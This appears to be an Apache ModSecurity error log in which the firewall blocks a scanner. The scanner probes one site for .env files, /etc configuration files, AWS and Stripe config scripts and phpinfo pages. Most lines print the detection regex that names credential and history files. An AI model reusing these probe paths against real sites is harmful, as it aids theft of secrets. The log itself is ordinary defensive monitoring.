[Tue May 26 14:30:05.198473 2026] [security2:error] [pid 610693:tid 610877] [client 195.178.110.199:32872] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru5AAAADY"]
[Tue May 26 14:30:05.212607 2026] [security2:error] [pid 610693:tid 610870] [client 195.178.110.199:32920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend-api/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru5gAAAC8"]
[Tue May 26 14:30:05.314486 2026] [security2:error] [pid 610693:tid 610899] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back-api/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru7AAAAEw"]
[Tue May 26 14:30:05.365580 2026] [security2:error] [pid 610693:tid 610920] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru8gAAAGE"]
[Tue May 26 14:30:05.509360 2026] [security2:error] [pid 610693:tid 610851] [client 195.178.110.199:32920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backup/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru-QAAABw"]
[Tue May 26 14:30:05.524197 2026] [security2:error] [pid 610693:tid 610832] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/be/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru-gAAAAk"]
[Tue May 26 14:30:05.598991 2026] [security2:error] [pid 610693:tid 610940] [client 85.208.96.203:32826] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-15th/day/2025-06-22/"] [unique_id "ahVhFTvNO3hpmlY6M8RvAQAAAHU"]
[Tue May 26 14:30:05.599091 2026] [security2:error] [pid 610693:tid 610940] [client 85.208.96.203:32826] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/november-15th/day/2025-06-22/"] [unique_id "ahVhFTvNO3hpmlY6M8RvAQAAAHU"]
[Tue May 26 14:30:05.654067 2026] [security2:error] [pid 610693:tid 610914] [client 195.178.110.199:48158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/client/.env"] [unique_id "ahVhFTvNO3hpmlY6M8RvBQAAAFs"]
[Tue May 26 14:30:05.674669 2026] [security2:error] [pid 610693:tid 610850] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/cms/.env"] [unique_id "ahVhFTvNO3hpmlY6M8RvCAAAABs"]
[Tue May 26 14:30:05.717724 2026] [security2:error] [pid 610693:tid 610863] [client 195.178.110.199:32910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/beta/.env"] [unique_id "ahVhFTvNO3hpmlY6M8RvCgAAACg"]
[Tue May 26 14:30:05.779938 2026] [security2:error] [pid 610693:tid 610873] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhFTvNO3hpmlY6M8Ru8AAAADI"]
[Tue May 26 14:30:05.805558 2026] [security2:error] [pid 610693:tid 610846] [client 195.178.110.199:32920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config.php"] [unique_id "ahVhFTvNO3hpmlY6M8RvEQAAABc"]
[Tue May 26 14:30:05.979818 2026] [security2:error] [pid 606909:tid 607125] [client 195.178.110.199:48094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/aws.php"] [unique_id "ahVhFV0yRtX9qA7aVUV0rQAAANs"]
[Tue May 26 14:30:06.099443 2026] [security2:error] [pid 610693:tid 610828] [client 195.178.110.199:48158] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/config.php"] [unique_id "ahVhFjvNO3hpmlY6M8RvJAAAAAU"]
[Tue May 26 14:30:06.118716 2026] [security2:error] [pid 610693:tid 610902] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvJgAAAE8"]
[Tue May 26 14:30:06.221808 2026] [security2:error] [pid 610693:tid 610935] [client 195.178.110.199:32850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/env.php"] [unique_id "ahVhFjvNO3hpmlY6M8RvKQAAAHA"]
[Tue May 26 14:30:06.277325 2026] [security2:error] [pid 610693:tid 610915] [client 195.178.110.199:48048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/config.inc.php"] [unique_id "ahVhFjvNO3hpmlY6M8RvLQAAAFw"]
[Tue May 26 14:30:06.305144 2026] [security2:error] [pid 610693:tid 610862] [client 195.178.110.199:32872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/nexmo.php"] [unique_id "ahVhFjvNO3hpmlY6M8RvLwAAACc"]
[Tue May 26 14:30:06.445976 2026] [security2:error] [pid 610693:tid 610944] [client 195.178.110.199:48072] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/module.config.php"] [unique_id "ahVhFjvNO3hpmlY6M8RvNQAAAHk"]
[Tue May 26 14:30:06.552418 2026] [security2:error] [pid 606909:tid 607057] [client 195.178.110.199:32858] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/stripe.php"] [unique_id "ahVhFl0yRtX9qA7aVUV0tAAAAJc"]
[Tue May 26 14:30:06.744530 2026] [security2:error] [pid 610693:tid 610912] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/crm/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvRgAAAFk"]
[Tue May 26 14:30:06.755539 2026] [security2:error] [pid 610693:tid 610868] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/cron/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvRwAAAC0"]
[Tue May 26 14:30:06.859574 2026] [security2:error] [pid 606909:tid 607133] [client 195.178.110.199:32928] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/demo/.env"] [unique_id "ahVhFl0yRtX9qA7aVUV0ugAAAOM"]
[Tue May 26 14:30:06.889812 2026] [security2:error] [pid 610693:tid 610882] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/develop/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvSQAAADs"]
[Tue May 26 14:30:06.907862 2026] [security2:error] [pid 610693:tid 610867] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/development/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvSgAAACw"]
[Tue May 26 14:30:06.929432 2026] [security2:error] [pid 610693:tid 610847] [client 195.178.110.199:33000] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/current/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvTgAAABg"]
[Tue May 26 14:30:06.934701 2026] [cgid:error] [pid 610693:tid 610851] [client 195.178.110.199:48166] AH01264: stderr from /home2/azurm42s/gestionbar.azurmediatec.com/dnscfg.cgi: script not found or unable to stat
[Tue May 26 14:30:06.999231 2026] [security2:error] [pid 610693:tid 610922] [client 195.178.110.199:32988] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/dev/.env"] [unique_id "ahVhFjvNO3hpmlY6M8RvVAAAAGM"]
[Tue May 26 14:30:07.011295 2026] [security2:error] [pid 610693:tid 610864] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/developer/.env"] [unique_id "ahVhFzvNO3hpmlY6M8RvVgAAACk"]
[Tue May 26 14:30:07.628450 2026] [security2:error] [pid 606909:tid 607076] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/etc/apache2/apache2.conf"] [unique_id "ahVhF10yRtX9qA7aVUV0xwAAAKo"]
[Tue May 26 14:30:07.774949 2026] [security2:error] [pid 606909:tid 607117] [client 195.178.110.199:32880] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/fe/.env"] [unique_id "ahVhF10yRtX9qA7aVUV0yQAAANM"]
[Tue May 26 14:30:08.365158 2026] [security2:error] [pid 610693:tid 610935] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/erp/.env"] [unique_id "ahVhGDvNO3hpmlY6M8RvewAAAHA"]
[Tue May 26 14:30:08.520828 2026] [security2:error] [pid 610693:tid 610849] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/frontend/.env"] [unique_id "ahVhGDvNO3hpmlY6M8RvfgAAABo"]
[Tue May 26 14:30:08.548439 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:19959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.83.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhGF0yRtX9qA7aVUV0zgAAALA"]
[Tue May 26 14:30:08.548593 2026] [security2:error] [pid 606909:tid 607082] [client 202.141.83.254:19959] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahVhGF0yRtX9qA7aVUV0zgAAALA"]
[Tue May 26 14:30:08.876123 2026] [security2:error] [pid 610693:tid 610917] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhGDvNO3hpmlY6M8RvfQAAAF4"]
[Tue May 26 14:30:08.950806 2026] [security2:error] [pid 610693:tid 610905] [client 195.178.110.199:32972] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/etc/"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/etc/boto.cfg"] [unique_id "ahVhGDvNO3hpmlY6M8RvjAAAAFI"]
[Tue May 26 14:30:09.082030 2026] [security2:error] [pid 610693:tid 610876] [client 195.178.110.199:48144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/infophp.php"] [unique_id "ahVhGTvNO3hpmlY6M8RvjQAAADU"]
[Tue May 26 14:30:09.082852 2026] [security2:error] [pid 610693:tid 610927] [client 195.178.110.199:48166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/info.php"] [unique_id "ahVhGTvNO3hpmlY6M8RvjgAAAGg"]
[Tue May 26 14:30:09.098803 2026] [security2:error] [pid 606909:tid 607090] [client 195.178.110.199:32928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/infos.php"] [unique_id "ahVhGV0yRtX9qA7aVUV01wAAALg"]
[Tue May 26 14:30:09.223104 2026] [security2:error] [pid 610693:tid 610929] [client 195.178.110.199:32966] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/front/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvlAAAAGo"]
[Tue May 26 14:30:09.233506 2026] [security2:error] [pid 610693:tid 610882] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/laravel/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvlQAAADs"]
[Tue May 26 14:30:09.323209 2026] [security2:error] [pid 610693:tid 610847] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/local/.env"] [unique_id "ahVhGTvNO3hpmlY6M8RvlwAAABg"]
[Tue May 26 14:30:09.361286 2026] [security2:error] [pid 610693:tid 610881] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhGDvNO3hpmlY6M8RviwAAADo"]
